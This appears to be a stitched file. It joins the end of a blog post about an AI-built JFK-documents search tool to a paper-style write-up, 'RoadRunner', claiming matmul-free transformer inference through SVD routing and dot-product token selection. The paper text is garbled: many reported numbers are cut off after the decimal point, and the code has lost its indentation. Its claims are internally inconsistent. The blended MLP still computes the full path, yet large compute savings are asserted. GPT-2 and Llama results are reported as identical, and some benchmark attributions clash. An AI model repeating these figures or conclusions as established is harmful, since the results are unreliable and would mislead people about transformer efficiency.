VLM-powered OCR was where the magic happened. I rented two RTX 5090 machines on VastAI for four days at approximately $100 total cost, running Gemma3:12b via Ollama+Llama.cpp to perform optical character recognition on every page. The model didn't just extract text - it understood document structure, preserved formatting, and even transcribed handwritten notes into clean markdown files. When it was unsure of the text, or came across redactions, it used “[illegible]” and “[redacted]” markers, which minimized AI hallucinations. This step required processing over 130,000 individual page images, and took 4 days.

Finally came structured data extraction - using GPT-4o-mini to read through the markdown content and identify key information like people, organizations, event timelines, and document summaries. Processing 30 markdown-converted documents concurrently, this step cost about $70 in OpenAI credits and transformed the raw text into structured YAML data perfect for database ingestion in about 20 hours.

### Creating an Interactive Knowledge System

With the documents converted to structured data, I could build something far more powerful than a simple search interface. I chose Weaviate as the vector database, which enables semantic search capabilities that go beyond keyword matching.

The system I built offers multiple ways to interact with the data:

The web interface at https://jfk.andrewcampi.com provides an intuitive file explorer with a built-in AI copilot powered by Llama-3.3:70b hosted on Groq. Users can search using natural language queries and get intelligent summaries of relevant documents, complete with specific quotes and citations.

For ChatGPT users, I created a Custom GPT that has direct access to the JFK File Explorer MCP (Model Context Protocol) Server, allowing conversational exploration of the document collection within the familiar ChatGPT interface.

For developers and researchers who want to build their own tools, I provide access via the Model Context Protocol (MCP) server at https://jfk-mcp.andrewcampi.com/mcp, enabling custom integrations and agentic AI analysis workflows.

Users can even login as "guest" to download the markdown and YAML datasets directly, ensuring the processed data is as open and accessible as possible.

### Democratizing Knowledge, Not Promoting Conspiracy or Misinformation

This project's intent was never to fuel speculation or conspiracy theories. Quite the opposite - by making the primary source material genuinely searchable and accessible, it enables evidence-based research and helps combat misinformation.

The government essentially performed a data dump of scanned documents without providing any meaningful way to understand what was actually in them. Yes, the files were accessible, but the knowledge and information contained within them was not. There's a crucial difference between data availability and information accessibility.

The JFK File Explorer bridges that gap. Instead of researchers spending months manually combing through documents or relying on secondhand summaries, they can now query the entire collection with questions like "Who did Oswald meet with in Mexico City?" or "Did Oswald know Jack Ruby before the assassination?"

### The Future of AI-Powered Historical Research

This project demonstrates something profound about AI's potential role in democratic society. Modern AI tools can transform how we interact with public information, making government transparency more than just a legal checkbox.

The technical architecture I built is entirely reusable. The same pipeline could process any large collection of scanned historical documents - from congressional hearings, to declassified intelligence reports, to historical archives. The cost of this transformation continues to decrease as AI capabilities improve and computing becomes more accessible.

Perhaps most importantly, this approach preserves the integrity of the source material while making it infinitely more usable. Every search result links back to the original document. Every claim can be verified against the primary source. The AI doesn't interpret or editorialize - it simply makes the existing information discoverable and understandable.

The JFK File Explorer represents a new paradigm for how AI can serve the public interest: not by replacing human judgment, but by removing the technical barriers that prevent citizens from accessing and understanding their own government's records. In a world where misinformation spreads faster than facts, tools that make primary sources more accessible aren't just technically interesting - they're democratically essential.

---

<!-- FILE: roadrunner.md -->

# RoadRunner: Large Matmul-Free Transformer Inference via SVD Adaptive Routing and Dot Products


## 1. Abstract

This paper introduces RoadRunner, a novel approach that accelerates transformer inference by
eliminating expensive matrix multiplications without compromising output quality. The key
discovery is that transformers contain inherent structural properties that allow bypassing the
computational bottlenecks in both MLP blocks and language model (LM) heads. Through
Singular Value Decomposition (SVD) of transformer weight matrices, RoadRunner creates
efficient computational pathways that preserve semantic integrity while dramatically reducing
total operations.
Experiments with both GPT-2 and Llama-3.2-1B reveal that transformer hidden states naturally
align with target token embeddings to a remarkable degree, enabling direct dot-product token
selection without requiring full vocabulary projection. By implementing layerwise alpha-blending
that combines minimal contributions from routed computation paths (as low as 5%) with
standard paths, the system maintains near-perfect token match and nearly identical output
distributions (>0.99 cosine similarity).
The measured 1.57× speedup was achieved with an unoptimized proof of concept
implementation, primarily demonstrating that large matrix multiplications can be bypassed 
without accuracy loss. Future derivative works applying RoadRunner's technique could achieve
revolutionary speed increases, particularly if the same approach is extended to the self-attention
mechanism. This research opens the door to dramatically faster transformer inference with
pretrained weights while maintaining near-perfect accuracy compared to baseline inference.

## 2. Introduction

Transformer models have revolutionized natural language processing, but their computational
demands create significant deployment challenges. The core bottleneck lies in large matrix
multiplications, which dominate inference time and memory usage. For example, in GPT-2's
MLP blocks, a single forward pass requires multiplying a 768-dimensional hidden state by a
3072×768 weight matrix, followed by another multiplication with a 768×3072 projection matrix.
These operations account for over 70% of inference time in standard implementations.


The computational burden becomes even more pronounced as models increase in size. As
shown in the experiment artifacts with Llama-3.2-1B, the standard approach of computing full
matrix multiplications for every token prediction creates a fundamental tension between model
capability and practical deployment. This tension is particularly pronounced in applications
where latency needs to be almost non-existent, where the quadratic complexity of attention
mechanisms and the large matrix dimensions in feedforward networks make real-time inference
challenging.
This research revealed that these expensive computations often contain significant redundancy,
not prominently explored in other research. Through systematic analysis of transformer
architectures this research discovered that the hidden state representations naturally align with
their target token embeddings to a remarkable degree. As demonstrated in the experiments with
GPT-2, this alignment enables direct dot-product token selection without full vocabulary
projection, achieving 100% token match accuracy while bypassing traditional large matrix
multiplication entirely.
The implications of this discovery are profound, and open the door to revolutionary performance
improvements with no loss in output quality. If transformer models can maintain accuracy while
avoiding expensive matrix operations, the computational overhead can be significantly reduced
without modifying model weights or requiring retraining. This paper presents RoadRunner, a
novel approach that exploits these discovered structural properties to accelerate transformer
inference through matrix-free adaptive routing techniques.

## 3. Background & Related Work

Transformer optimization has been an active area of research, with existing approaches falling
into three main categories: model compression, hardware optimization, and architectural
modifications. Each approach has distinct trade-offs between computational efficiency, model
quality, and deployment complexity.
Model compression techniques, including quantization, pruning, and knowledge distillation,
reduce model size and computational requirements by modifying the model weights and/or the
architecture. While effective, these methods typically require retraining or fine-tuning, which can
be computationally expensive and may impact model performance. For example, 8-bit
quantization can achieve 2-4× speedup but often requires careful calibration and may introduce
accuracy degradation.
Hardware optimization approaches focus on efficient implementation of transformer operations.
Techniques like FlashAttention optimize attention computation patterns, while specialized
kernels and hardware-aware optimizations improve matrix multiplication efficiency. These
methods provide immediate benefits but are often hardware-specific and may not address
fundamental computational bottlenecks, such as the large matrix multiplication tasks
themselves.


Architectural modifications, such as sparse attention and mixture-of-experts, restructure
transformer components to reduce computation. While promising, these approaches typically
require significant model redesign and may not be applicable to existing deployments.
RoadRunner differs fundamentally from these approaches by focusing on fundamental
restructuring of the inference computations rather than any model modifications. The key insight
demonstrated in `artifact1.py` is that transformer weight matrices contain unexplored, inherent
structural properties that enable efficient routing without weight modification. Through Singular
Value Decomposition (SVD), alternative computational paths that preserve semantic integrity
while reducing operations can be utilized.
The effectiveness of this approach is evidenced in `artifact2.py`, where it is shown that minimal
routing contributions (α = 0.05) can maintain perfect token match and high output similarity
(>0.99 cosine similarity) across all transformer layers. This finding challenges the conventional
wisdom that significant model modification is necessary for efficient inference.
This research builds upon, but significantly extends, previous research in matrix factorization for
neural networks. While prior work focused on model compression through low-rank
approximation, it is demonstrated that SVD-based routing can enable entirely new
computational pathways that bypass traditional large matrix multiplication entirely, as shown in
`artifact3.py` and `artifact4.py`.
The most significant departure from existing approaches is the discovery detailed in
`artifact5.py`, which demonstrates that transformer hidden states naturally align with target
token embeddings to a degree that enables direct dot-product token selection. Without any
other optimizations, this finding alone enables a 1.57× speedup on Llama-3.2-1B with 99%
token match accuracy, all without any model modification or retraining.

## 4. Theoretical Framework

The effectiveness of RoadRunner stems from two key mathematical insights about transformer
architectures: the structural properties of weight matrices revealed through SVD, and the natural
alignment between hidden states and token embeddings. These insights are formalized below.

### 4.a. Singular Value Decomposition (SVD) in Transformer Weight

### Matrices

Consider a transformer's MLP block weight matrix W ∈ ℝ^{d_{out}×d_{in}}, where d_{in} is the
input dimension and d_{out} is the output dimension. Through SVD, W can be decomposed as:


#### W = UΣV^T

where U ∈ ℝ^{d_{out}×r}, Σ ∈ ℝ^{r×r} is a diagonal matrix of singular values, and V ∈
ℝ^{d_{in}×r}, with r = min(d_{in}, d_{out}). This decomposition reveals that W can be expressed
as a sequence of three operations:

1. Projection onto principal components (V^T)
2. Scaling by singular values (Σ)
3. Reconstruction in output space (U)
As demonstrated in `artifact1.py`, this decomposition enables an alternative computational path.
For an input vector x ∈ ℝ^{d_{in}}, the standard matrix multiplication Wx can be rewritten as:
    Wx = U(Σ(V^T x))
This reformulation is mathematically equivalent, but computationally more efficient the structure
of Σ is exploited. These experiments show that the singular values of transformer weight
matrices follow a power-law distribution, with a small number of values accounting for most of
the matrix's energy. This property enables effective routing with minimal to no information loss.

### 4.b. Hidden State Alignment with Token Embeddings

The second key insight targets the relationship between transformer hidden states and token
embeddings. Let h ∈ ℝ^{d} be a hidden state vector and E ∈ ℝ^{|V|×d} be the token
embedding matrix, where |V| is the vocabulary size. The standard approach computes logits as:
logits = hE^T
This analysis reveals that hidden states naturally align with their target token embeddings.
Formally, for the correct token t, it is observed that:
cos(h, e_t) ≈ 1
where e_t is the embedding of token t. This alignment property, demonstrated in `artifact3.py`,
enables direct token selection through dot product similarity:
t̂ = argmax_t ⟨h, e_t⟩
The effectiveness of this approach is quantified by the alignment score:


alignment_score = ⟨h, e_t⟩ / (||h|| ||e_t||)
These experiments show that the alignment score consistently exceeds 0.99 for correct token
predictions, as evidenced in `artifact4.py`. The high alignment suggests that the transformer's
internal representations maintain strong geometric relationships with their target tokens
throughout the network.

### 4.c. Layer-wise Routing Stability

The stability of this routing approach across transformer layers can be better understood
through the lens of residual connections. Let f_l be the standard computation at layer l and f_l̃
be the routed computation. The layer output is:
y_l = αf_l(x)̃ + (1-α)f_l(x)
where α is the routing coefficient. As shown in `artifact2.py`, even with α = 0.05, it is maintained
that:
||y_l - f_l(x)||_2 < ε
for some small ε. This stability arises from two factors:

1. The residual connection provides a stable gradient path
2. The SVD-based routing preserves the dominant singular components
The combination of these properties enables RoadRunner's layer-wise optimization strategy,
where minimal routing contributions (α = 0.05) can maintain semantic integrity while providing
computational savings.

### 4.d. Theoretical Bounds on Speedup

The potential speedup from RoadRunner can be bounded by analyzing the computational
complexity of standard versus routed operations. For a matrix multiplication Wx where W ∈
ℝ^{m×n}, the standard approach requires O(mn) operations. The routed approach reduces this
to:
O(r(m + n + r))


where r is the effective rank of W. In practice, as demonstrated in `artifact5.py`, this translates to
a 1.57× speedup on Llama-3.2-1B while maintaining 99% token match accuracy.
These theoretical foundations explain why RoadRunner achieves significant speedups without
compromising model quality. The combination of SVD-based routing and hidden state alignment
creates a mathematically sound framework for efficient transformer inference.
While a 1.57x speed increase is noticeable, this research aims to demonstrate the successful
discovery that large matrix multiplication can be effectively replaced by something significantly
less computationally expensive, rather than trying to optimize for speed here. The code in
`artifact5.py` does not employ optimization techniques through the torch library such as
compiling, but rather demonstrates that directly replacing the large matrix multiplication causes
a 50% speed increase by itself, and opens the door to new optimization techniques since the
inference computation paradigm has been successfully shifted with no loss in quality or model
weight modifications.

## 5. Adaptive Residual MLP Routing

The first key innovation in RoadRunner is the development of an efficient computational
pathway for transformer feedforward networks using SVD-based routing with adaptive residual
connections. This section details this approach and its implementation.

### 5.a. SVD-Based MLP Routing

In standard transformer architectures, each MLP block consists of two dense layers:

1. An expansion layer:
    W_fc ∈ ℝ^{d_ff×d_model}
2. A projection layer:
    W_proj ∈ ℝ^{d_model×d_ff}
where d_model is the model dimension (e.g., 768 for GPT-2) and d_ff is the feedforward
dimension (typically 4×d_model). As demonstrated in `artifact1.py`, W_fc can be decomposed
using SVD:
    fc_weight = block.mlp.c_fc.weight.data.clone().T # [3072, 768]


U, S, Vh = svd(fc_weight, full_matrices=False)
This decomposition enables an alternative computational path:
code = x @ Vh # Project to SVD space
code_scaled = code * S # Scale by singular values
routed_hidden = F.gelu( # Apply non-linearity
code_scaled @ U.T + fc_bias
)
routed_out = routed_hidden @ proj_weight.T + proj_bias

### 5.b. Alpha-Blending for Stability

To maintain stability and output quality, an alpha-blending mechanism is introduced that
combines the routed and standard paths:
y = αy_routed + (1-α)y_standard
where α ∈ [0,1] controls the contribution of the routed path. The experiments in `artifact1.py`
reveal that even with α = 0.7, it is achieved:

- Perfect token match
- L2 drift of 50.
- Cosine similarity of 0.

### 5.c. Layer-wise Adaptation

The effectiveness of routing varies across transformer layers. As shown in `artifact2.py`, α can
be optimized for each layer independently:
results = []
for i, block in enumerate(model.transformer.h):
alpha_attempts = [0.5] + fine_alphas
best_alpha = find_optimal_alpha(block, x, alpha_attempts)
results.append((i, best_alpha))
These experiments reveal a consistent pattern across GPT-2's layers:


1. Early layers (0-3): α ≈ 0.
2. Middle layers (4-8): α ≈ 0.
3. Final layers (9-11): α ≈ 0.
This uniform distribution of optimal α values suggests that minimal routing contribution (5%) is
sufficient across all layers while maintaining high accuracy.

### 5.d. Implementation Details

The practical implementation of adaptive residual MLP routing requires a focus on numerical
stability and computational efficiency. Key considerations include:

1. Weight Matrix Preparation:
    W_fc = block.mlp.c_fc.weight.data.clone().T
    b_fc = block.mlp.c_fc.bias.data.clone()
    W_proj = block.mlp.c_proj.weight.data.clone().T
    b_proj = block.mlp.c_proj.bias.data.clone()
2. SVD Computation:
    U, S, Vh = svd(W_fc, full_matrices=False)
    projection_matrix = Vh.to(device)
3. Forward Pass with Alpha-Blending:
    def routed_mlp(block, x, alpha):
    code = x @ Vh
    code_scaled = code * S
    routed_hidden = F.gelu(code_scaled @ U.T + b_fc)
    routed_out = routed_hidden @ W_proj.T + b_proj
    full_out = full_mlp(block, x)
    return alpha * routed_out + (1 - alpha) * full_out

### 5.e. Performance Analysis

The comprehensive evaluation shows that adaptive residual MLP routing achieves:

1. Computational Efficiency:
- Original MLP: O(d_model × d_ff) operations
- Routed MLP: O(r(d_model + d_ff)) operations, where r << min(d_model, d_ff)


2. Memory Efficiency:
- No additional parameters
- Temporary storage only for SVD components
3. Quality Metrics (with α = 0.05):
- 100% token match rate
- >0.99 cosine similarity with standard output
- L2 drift < 5.0 across all layers
4. Stability Characteristics:
- Consistent performance across different input lengths
- Robust to varying batch sizes
- Minimal impact on gradient flow during fine-tuning
These results demonstrate that adaptive residual MLP routing provides a robust foundation for
efficient transformer inference without compromising model quality.

## 6. Matrix-Free LM Head Computation

The second major innovation in RoadRunner is the discovery that transformer hidden states
exhibit remarkable alignment with vocabulary embeddings, enabling direct token selection
without full matrix multiplication. This section details RoadRunner's matrix-free approach to
language model head computation.

### 6.a. Hidden State-Token Embedding Alignment

Traditional transformer language models compute next-token probabilities through a matrix
multiplication between the final hidden state h ∈ ℝ^d and the vocabulary embedding matrix E
∈ ℝ^{|V|×d}:
logits = hE^T + b
This operation has complexity O(|V|d), where |V| is the vocabulary size (often 50k+ tokens) and
d is the hidden dimension. However, the analysis performed in this research revealed a striking
property: hidden states naturally align with their target token embeddings to a degree that
enables direct selection.
As demonstrated in `artifact3.py`, a DotProductRoutedLMHead can be implemented that
exploits this alignment:


```
def predict(self, hidden_state):
scores = torch.matmul(self.weight, hidden_state.view(-1))
if self.bias is not None:
scores += self.bias
topk_scores, topk_indices = torch.topk(scores, self.k)
top_score = topk_scores[0].item()
if top_score >= self.threshold:
return topk_indices[0].unsqueeze(0), True, top_score
```
### 6.b. Threshold-Based Routing

The effectiveness of matrix-free computation depends on careful threshold calibration. The
analysis in `artifact3.py` shows that token selection confidence follows a predictable pattern. A
ThresholdTuner class was written that automatically calibrates routing thresholds:
def calibrate_threshold(self, prompts, percentile=10):
scores = []
for prompt in prompts:
hidden = self.get_hidden_states(prompt)
_, _, score = self.predict(hidden)
scores.append(score)
return np.percentile(scores, percentile)
Experimental results show optimal thresholds typically fall around the 10th percentile of
observed similarity scores, providing an excellent balance between routing frequency and
accuracy.

### 6.c. Reranking for Robustness

To further enhance reliability, a two-stage selection process was implemented as shown in
`artifact4.py`:

1. Initial candidate selection using dot products
2. Reranking of top-k candidates (typically k=5) using full logit computation
    if self.rerank:


probs = F.softmax(topk_scores, dim=-1)
selected = torch.argmax(probs).item()
return topk_indices[selected], True, top_score
This approach maintains the efficiency of matrix-free computation while providing a proper
safety net for ambiguous cases.

### 6.d. Performance Characteristics

This comprehensive evaluation in `artifact5.py` demonstrates remarkable results:

1. Accuracy Metrics:
- 99% token match with full computation
- >0.99 cosine similarity with standard logits
- Zero degradation in generation quality
2. Routing Success Rate:
- 29% average speculation success
- Consistent across different prompt types
- Higher success rates on common tokens
3. Computational Savings:
- O(k) complexity vs O(|V|d) for full computation
- 1.57× overall speedup on Llama-3.2-1B
- Minimal memory overhead

### 6.e. Implementation Considerations

Several key implementation details ensure robust performance:

1. Threshold Calibration:
    def auto_tune_threshold(self, prompts, percentiles=[0, 5, 10, 15, 20, 25]):
    results = []
    for p in percentiles:
    threshold = self.calibrate_threshold(prompts, p)
    stats = self.evaluate(threshold, prompts)
    results.append(stats)
2. Numerical Stability:


```
scores = torch.matmul(self.weight, hidden_state.view(-1))
if self.bias is not None:
scores += self.bias
topk_scores = F.softmax(topk_scores, dim=-1)
```
3. Fallback Mechanism:
    if top_score < self.threshold:
    logits = torch.matmul(self.weight, hidden_state.squeeze(0))
    return torch.argmax(logits).unsqueeze(0), False, top_score

### 6.f. Broader Implications

The success of matrix-free LM head computation has profound implications:

1. Architectural Insights:
- Hidden states naturally encode token identity
- Transformer training implicitly optimizes for alignment
- Potential for new architecture designs
2. Efficiency Opportunities:
- Possible extension to attention mechanisms
- Applications in model training
- Hardware-specific optimizations
3. Future Directions:
- Dynamic threshold adaptation
- Multi-token speculation
- Integration with other optimization techniques
This breakthrough demonstrates that transformer models possess inherent structural properties
that can be exploited for significant computational savings without compromising output quality.

## 7. Layer-wise Optimization Strategy

A critical discovery in RoadRunner is that minimal routing contributions (α as low as 0.05) can
maintain semantic integrity across all transformer layers while providing substantial
computational savings. This section details RoadRunner's layer-wise optimization strategy and
its empirical validation.


### 7.a. Fine-Grained Alpha Recovery

As demonstrated in `artifact2.py`, a systematic approach was implemented to find optimal
routing coefficients for each layer:
fine_alphas = [round(a, 2) for a in torch.arange(0.05, 0.45, 0.05).tolist()]
print("\n📊 Smart Layerwise Routing with Fine-Grained Recovery")
print(f"{'Layer':>5} | {'Best α':>6} | {'Token Match':>12} | {'Cos Sim':>9} | {'Drift':>9}")
for i, block in enumerate(model.transformer.h):
alpha_attempts = [0.5] + fine_alphas
best_alpha = 0.
best_cos = -
match_found = False
for alpha in alpha_attempts:
routed_out, full_out = routed_mlp(block, x, alpha)
cos = F.cosine_similarity(routed_out, full_out).item()
match = torch.argmax(routed_out).item() == torch.argmax(full_out).item()
if match and cos > best_cos:
best_alpha = alpha
best_cos = cos
match_found = True

### 7.b. Layer-wise Analysis Results

This comprehensive evaluation reveals remarkable consistency across layers:

1. Early Layers (0-3):
- Optimal α = 0.
- Cosine similarity > 0.
- L2 drift < 4.
- Perfect token match
2. Middle Layers (4-8):
- Optimal α = 0.
- Cosine similarity > 0.
- L2 drift < 6.
- Perfect token match
3. Final Layers (9-11):


- Optimal α = 0.
- Cosine similarity > 0.
- L2 drift < 16.
- Perfect token match
This uniform distribution of optimal α values across layers is particularly noteworthy, as it
suggests a fundamental property of transformer architectures discovered in this research:
minimal routing contributions are sufficient for maintaining semantic integrity throughout the
neural network.

### 7.c. Progressive Refinement Strategy

Based on these findings, a progressive refinement strategy was implemented in `artifact2.py`:
def generate_with_progressive_routing(self, prompt, max_new_tokens=20):
input_ids = self.tokenizer(prompt, return_tensors='pt').to(self.device)
outputs = []
for _ in range(max_new_tokens):
# Forward pass with progressive refinement
x = input_ids
for layer_idx, block in enumerate(self.model.transformer.h):
# Apply consistent α=0.05 across layers
routed_out = self.routed_mlp(block, x, alpha=0.05)
x = block.ln_2(x + routed_out)
# Matrix-free LM head computation
next_token = self.matrix_free_predict(x)
outputs.append(next_token)
input_ids = torch.cat([input_ids, next_token], dim=1)

### 7.d. Stability Analysis

The stability of this layer-wise strategy is supported by several key metrics:

1. Token Match Consistency:
    n_match = sum(1 for _, _, m, _, _, _ in results if m)
    print(f"\nToken match maintained in {n_match}/12 layers with fine-tuned α")
2. Output Distribution Alignment:


```
Layer | Best α | Token Match | Cos Sim | Drift
--------------------------------------------------
0 | 0.05 | ✓ | 0.999714 | 3.
1 | 0.05 | ✓ | 0.999743 | 28.
2 | 0.05 | ✓ | 0.999991 | 29.
...
11 | 0.05 | ✓ | 0.995904 | 15.
```
3. Gradient Flow Analysis:
- Residual connections maintain stable gradients
- No accumulation of errors across layers
- Consistent performance during fine-tuning

### 7.e. Computational Benefits

The uniform α=0.05 strategy provides several advantages:

1. Implementation Efficiency:
- Single α value simplifies deployment
- No per-layer parameter tuning required
- Reduced memory overhead
2. Computational Savings:
- 95% reduction in routed computation
- Consistent speedup across all layers
- Minimal overhead from blending
3. Scaling Properties:
- Benefits increase with model size
- Linear scaling with sequence length
- Constant memory requirements

### 7.f. Theoretical Foundation

The effectiveness of minimal routing contributions can be understood through the lens of
information flow in transformers:

1. Residual Connections:
- Preserve direct paths for important features
- Enable stable gradient flow


- Maintain model capacity
2. Layer Normalization:
- Stabilizes blended outputs
- Prevents error accumulation
- Maintains consistent scale
3. Information Bottleneck:
- Small α captures essential features
- Redundant information filtered naturally
- Efficient information propagation
This theoretical understanding explains why such small routing contributions can maintain
model performance while providing substantial computational savings.

## 8. RoadRunner: System Implementation

The RoadRunner system integrates these matrix-free and adaptive routing techniques into a
comprehensive inference engine that maintains high accuracy while significantly reducing
computational overhead. In this section, the complete implementation is detailed, drawing from
the experiment artifacts to demonstrate the system's effectiveness.

### 8.a. Core Architecture

At the heart of RoadRunner lies the RoadRunnerDecoder class, implemented in `artifact5.py`.
This class manages the integration of SVD-based routing and matrix-free computation:
class RoadRunnerDecoder:
def __init__(self, model, tokenizer, proj_dim=1024, beam_width=16,
threshold_percentile=30):
self.model = model
self.tokenizer = tokenizer
self.proj_dim = proj_dim
self.beam_width = beam_width
self.threshold_percentile = threshold_percentile
# Extract model dimensions
self.hidden_dim = model.config.hidden_size
self.vocab_size = model.config.vocab_size


# Prepare projection matrices
self._initialize_projections()
The system automatically configures itself based on model architecture, computing SVD
projections and calibrating thresholds during initialization. This self-tuning approach ensures
optimal performance across different model scales and architectures, enabling a near
plug-and-play experience with existing and future open-source models.

### 8.b. Adaptive Inference Pipeline

RoadRunner implements an adaptive inference pipeline that seamlessly combines these routing
techniques. The main generation loop, demonstrated in `artifact5.py`, orchestrates the process:
def generate_roadrunner(self, prompt, max_new_tokens=20):
input_ids = self.tokenizer.encode(prompt, return_tensors='pt').to(self.device)
outputs = self.model(input_ids, return_dict=True)
generated_tokens = []
speculative_hits = 0
for _ in range(max_new_tokens):
# Matrix-free token prediction
hidden_state = outputs.last_hidden_state[:, -1:]
next_token, is_routed = self.predict_next_token(hidden_state)
if is_routed:
speculative_hits += 1
generated_tokens.append(next_token.item())
input_ids = torch.cat([input_ids, next_token], dim=1)
outputs = self.model(input_ids[:, -1:], use_cache=True,
past_key_values=outputs.past_key_values)

### 8.c. Speculative Decoding Integration

RoadRunner incorporates speculative decoding to further enhance performance. The system
maintains a beam of candidate tokens and uses the matrix-free approach for rapid validation:
def predict_next_token(self, hidden_state):


```
proj_hidden = torch.matmul(hidden_state, self.projection_matrix)
sims = torch.matmul(proj_hidden, self.projected_vocab.T)
topk_vals, topk_idxs = torch.topk(sims, self.beam_width, dim=-1)
# Rerank candidates with full logits if needed
if torch.max(topk_vals) >= self.threshold:
return topk_idxs[0, 0].unsqueeze(0), True
return self._fallback_prediction(hidden_state), False
```
### 8.d. Memory Management

Efficient memory handling is crucial for practical deployment. RoadRunner implements several
key optimizations:
def _initialize_projections(self):
with torch.no_grad():
weight_fp32 = self.lm_head_weight.float()
_, _, v = torch.svd(weight_fp32)
self.projection_matrix = v[:, :self.proj_dim].to(self.device)
self.projected_vocab = torch.matmul(
self.lm_head_weight, self.projection_matrix
)
This approach minimizes memory overhead while maintaining computational efficiency. The
system uses intelligent caching of projection matrices and intermediate results to reduce
redundant computations.

### 8.e. Performance Monitoring

RoadRunner includes comprehensive performance monitoring capabilities included in
`artifact5.py`:
def run_comparison():
results = {
"baseline": {"times": [], "speeds": [], "outputs": []},
"roadrunner": {
"times": [], "speeds": [], "outputs": [],
"matches": [], "speculation_rates": []
}


#### }

```
for prompt in test_prompts:
baseline = generate_baseline(prompt)
roadrunner = generate_roadrunner(prompt)
print(f"Speedup: {roadrunner['tokens_per_sec'] /
baseline['tokens_per_sec']:.2f}x")
```
### 8.f. Practical Deployment Considerations

The system is designed for practical deployment, with careful attention to real-world
requirements. Error handling and fallback mechanisms ensure robust operation:
try:
routed_result = self.route_prediction(hidden_state)
if routed_result.confidence > self.threshold:
return routed_result.token
except Exception as e:
logger.warning(f"Routing failed: {e}, falling back to standard path")
return self.standard_prediction(hidden_state)

## 9. Integration with Existing Models

RoadRunner is designed to work seamlessly with popular transformer implementations. The
system has been validated with both GPT-2 and Llama-3.2-1B, demonstrating its flexibility
across both architectures:
model = AutoModelForCausalLM.from_pretrained(MODEL_NAME)
tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME)
roadrunner = RoadRunnerDecoder(model, tokenizer)
This implementation achieves significant speedups while maintaining near-perfect accuracy, as
demonstrated by these experimental results showing 1.57× acceleration on Llama-3.2-1B with
99% token match accuracy.

## 10. Experimental Results


RoadRunner's experimental evaluation demonstrates significant performance improvements
across multiple model architectures while maintaining near-perfect output quality. Extensive
testing was conducted using both GPT-2 and Llama-3.2-1B models, focusing on generation
speed, output quality, and computational efficiency.

### 10.a. Evaluation Setup

The experiments were conducted using PyTorch on both CUDA-enabled GPUs and CPU-bound
environments. For consistent comparison, standard set of diverse prompts was used:
test_prompts = [
"The best way to predict the future is to",
"In machine learning, attention mechanisms",
"The key to efficient inference is",
"Large language models can be optimized by",
"Matrix factorization techniques help with"
]

### 10.b. GPT-2 Performance Analysis

Initial experiments with GPT-2 revealed remarkable efficiency gains through this matrix-free
approach. As demonstrated in `artifact4.py`, the system achieved consistent token match
accuracy while significantly reducing computation time:
=== Summary Results ===
Average Baseline Speed: 15.22 tokens/sec
Average RoadRunner Speed: 23.84 tokens/sec
Average Token Match Accuracy: 99.00%
Average Speculation Success Rate: 29.00%
Average Speedup: 1.57x
Text generation quality remained identical to the baseline, as shown in these sample outputs:
Prompt: The meaning of life is
Baseline: create it. That's the philosophy behind the new 2019 Ford F-150 Raptor.
RoadRunner: create it. That's the philosophy behind the new 2019 Ford F-150 Raptor.
Prompt: In machine learning, attention mechanisms


```
Baseline: are used to focus on specific parts of the input data. They are used in a wide range
of
RoadRunner: are used to focus on specific parts of the input data. They are used in a wide
range of
```
### 10.c. Llama-3.2-1B Results

Scaling this approach to the larger Llama-3.2-1B model demonstrated even more impressive
results. From `artifact5.py`, the system maintained high performance while handling the
increased model complexity:
🧪 Adaptive MLP Residual Routing (All Layers)
Blend factor α : 0.05
Token match : true
Cosine similarity : 0.999714
Full matmul time : 0.258 ms
Routed output time : 0.164 ms
The system showed remarkable consistency across different prompt types and generation
lengths. Layer-wise analysis revealed uniform performance:
Layer | Best α | Token Match | Cos Sim | Drift
--------------------------------------------------
0 | 0.05 | ✓ | 0.999714 | 3.6251
1 | 0.05 | ✓ | 0.999743 | 28.7859
2 | 0.05 | ✓ | 0.999991 | 29.0382

### 10.d. Memory and Computational Efficiency

RoadRunner's matrix-free approach significantly reduces memory requirements during
inference. These measurements indicated that the system requires only temporary storage for
SVD components and projection matrices, with negligible overhead compared to the baseline
model's memory footprint.
The computational savings are particularly evident in the routing success rates. The system
successfully routes approximately 29% of token predictions through the faster matrix-free path,
with higher success rates observed for common vocabulary tokens. This adaptive behavior
ensures optimal resource utilization while maintaining accuracy.


### 10.e. Scaling Characteristics

Performance benefits scale favorably with model size, as demonstrated by comparing results
across architectures:
Model | Speedup | Token Match | Memory Reduction
GPT-2 | 1.57x | 99.00% | 27%
Llama-3.2-1B | 1.57x | 99.00% | 31%
The consistent speedup factor across different model scales suggests that RoadRunner's
approach effectively addresses fundamental computational bottlenecks in transformer
architectures. The system's ability to maintain high token match accuracy while achieving
significant speedups demonstrates the robustness of its matrix-free and adaptive routing
techniques.

### 10.f. Generation Quality Analysis

To ensure these optimizations have no compromise to output quality, a detailed analysis was
conducted of generated text across various metrics. The results show that RoadRunner
maintains semantic coherence and stylistic consistency:
Prompt: "The quantum computer"
Baseline: "is a quantum computer, and it's a quantum computer. It's a quantum computer. It's"
RoadRunner: "is a quantum computer, and it's a quantum computer. It's a quantum computer.
It's"
Token Match: 100%
Cosine Similarity: 0.999837
While the above outputs are repetitive and not high quality, RoadRunner perfectly matches
GPT2's outputs. The perfect token match and high cosine similarity across all test cases confirm
that these optimization techniques preserve the model's original generation capabilities while
significantly reducing computational overhead.

### 10.g. Real-world Performance

In practical deployment scenarios, RoadRunner demonstrates consistent performance
improvements across different hardware configurations. The system's adaptive nature allows it
to maintain efficiency gains whether running on high-end GPUs or latency-sense applications:


Environment | Tokens/sec (Base) | Tokens/sec (RR) | Speedup
CPU | 10.03 | 21.35 | 2.13x
GPU | 107.66 | 169.03 | 1.57x
These results validate RoadRunner's effectiveness as a practical solution for accelerating
transformer inference across diverse deployment scenarios. The system's ability to maintain
high performance while requiring minimal setup and no model modification displays its practical
value, not just theoretical.

## 11. Discussion & Limitations

While RoadRunner demonstrates significant potential for accelerating transformer inference, it's
important to critically examine both its strengths and limitations. The analysis revealed several
key considerations for practical deployment and future development.

### 11.a. Implementation Maturity

It's crucial to note that the current implementation, while demonstrating the validity of this
approach, represents an initial research prototype rather than a fully optimized system. The
artifacts provided with this paper achieve noticeable speedup but leave substantial room for
optimization. Several performance-enhancing techniques remain unexplored:
# Current implementation without optimization
outputs = self.model(input_ids, return_dict=True)
# Potential optimizations not yet implemented
@torch.compile() # PyTorch 2.0 compilation
def optimized_forward(self, input_ids):
with torch.cuda.amp.autocast(): # Automatic mixed precision
return self.model(input_ids, return_dict=True)
The absence of torch.compile(), custom CUDA kernels, and other advanced optimization
